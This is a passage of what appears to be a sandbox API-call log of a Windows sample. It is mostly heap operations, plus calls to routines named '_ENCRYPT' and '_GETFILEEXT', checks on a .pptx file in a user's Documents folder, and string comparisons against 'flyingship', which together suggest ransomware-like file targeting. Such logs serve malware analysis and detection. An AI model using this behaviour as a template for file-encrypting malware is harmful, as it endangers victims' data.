lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0171.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0171.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0171.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0171.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0171.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0171.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0171.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0171.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0171.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0171.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0171.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0171.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0171.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0171.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0171.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0171.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0171.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0171.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0171.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0171.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0171.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0171.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0171.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.086] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0171.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0171.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0171.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0171.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0171.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0171.086] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0171.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0171.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0171.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0171.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0171.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0171.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0171.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0171.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0171.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0171.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0171.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0171.087] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0171.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0171.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0171.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0171.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0171.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0171.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0171.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0171.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.088] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0171.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0171.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba270 [0171.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba270, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0171.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0171.089] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0171.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0171.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0171.089] CloseHandle (hObject=0x120) returned 1 [0171.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0171.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0171.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0171.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0171.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0171.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0171.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0171.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0171.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0171.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0171.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0171.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0171.090] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0171.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0171.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0171.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0171.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0171.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0171.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0171.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0171.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0171.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0171.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0171.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.091] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0171.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0171.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0171.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0171.091] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0171.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0171.092] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0171.092] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0171.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0171.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.092] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0171.092] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0171.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0171.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0171.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0171.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0171.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0171.092] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0171.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0171.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0171.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.093] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.093] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.093] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a79df10, ftCreationTime.dwHighDateTime=0x1d57a75, ftLastAccessTime.dwLowDateTime=0x111572f0, ftLastAccessTime.dwHighDateTime=0x1d59c76, ftLastWriteTime.dwLowDateTime=0x111572f0, ftLastWriteTime.dwHighDateTime=0x1d59c76, nFileSizeHigh=0x0, nFileSizeLow=0xa7c0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="k55L_7uM1tYjpSGA.pptx", cAlternateFileName="K55L_7~1.PPT")) returned 0x90add8 [0171.093] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0171.093] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.094] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a79df10, ftCreationTime.dwHighDateTime=0x1d57a75, ftLastAccessTime.dwLowDateTime=0x111572f0, ftLastAccessTime.dwHighDateTime=0x1d59c76, ftLastWriteTime.dwLowDateTime=0x111572f0, ftLastWriteTime.dwHighDateTime=0x1d59c76, nFileSizeHigh=0x0, nFileSizeLow=0xa7c0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="k55L_7uM1tYjpSGA.pptx", cAlternateFileName="K55L_7~1.PPT")) returned 0x90add8 [0171.094] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0171.094] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 